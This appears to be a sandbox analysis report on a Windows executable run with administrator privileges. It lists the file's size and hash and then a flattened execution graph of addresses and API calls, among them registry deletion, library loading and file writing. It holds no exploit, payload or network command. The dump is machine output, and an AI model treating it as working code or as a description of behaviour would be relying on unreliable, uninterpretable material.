                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true


                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:17.5%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:21%
                                                                                                                                                                                                                                                                Total number of Nodes:1482
                                                                                                                                                                                                                                                                Total number of Limit Nodes:25
4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 
4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 
4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 
SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 
3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 
4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 
4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad 
SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 
3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API 
calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 
4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 
3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 
403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 
